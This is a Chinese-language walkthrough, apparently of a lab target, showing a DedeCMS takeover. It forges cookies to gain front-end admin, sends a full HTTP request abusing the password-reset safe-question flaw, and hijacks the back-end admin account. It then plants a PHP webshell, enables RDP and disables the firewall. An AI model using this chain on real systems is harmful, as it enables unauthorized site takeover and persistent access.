dedecms 後台介面如下
目錄掃描和 robots.txt 的內容和下面差不多,沒什麼可利用的
後台嘗試弱口令無法登錄,註冊個前台帳號用戶名密碼為 0001/111111,安全問題不要填寫。
註冊成功後,訪問http://10.1.10.62/member/index.php?uid=0001,來到如下介面
F12 查看網頁元素,複製 last_vid__ckMd5 值
last_vid__ckMd5 複製好後,登錄 0001 帳號。
打開 Cookies Manager,搜索網站 ip
修改 DedeUserID__ckMd5 的值為之前複製的 last_vid__ckMd5 的內容,未修改前的值如下
修改後如下
將 DedeUserID 改為 0001,兩個值改完後,可點擊下 Refresh,然後關閉。
刷新,然後就變成了 admin 用戶。
訪問http://10.1.10.62/member/resetpassword.php,burp 發送如下包
POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
dopost=safequestion&safequestion=0.0&safeanswer=&id=1
關注響應包中的這個鏈接
複製下來
http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM
去掉 amp;
http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM
瀏覽器訪問
直接來到了改密碼的介面
密碼設置為 666666。
這是前台 admin 用戶的密碼,接下來需要修改後台用戶名的密碼
訪問
http://10.1.10.62/member/edit_baseinfo.php
跳到完善資料頁面,直接點擊完成註冊即可
再一次訪問http://10.1.10.62/member/edit_baseinfo.php,來到如下頁面。
原密碼為 666666,新密碼改成 888888,填寫驗證碼和郵箱,更新成功。
訪問後台,用 admin/888888 登錄,登錄成功。
接下來是後台上傳 shell
來到文件式管理器,新建文件
文件為 s.php,寫個馬
文件如下:
蟻劍 base64 編碼連接
如果 3389 沒開,可以上傳工具包中的 vbs 腳本開啟端口
關閉防火牆
修改管理員密碼
遠程桌面登錄
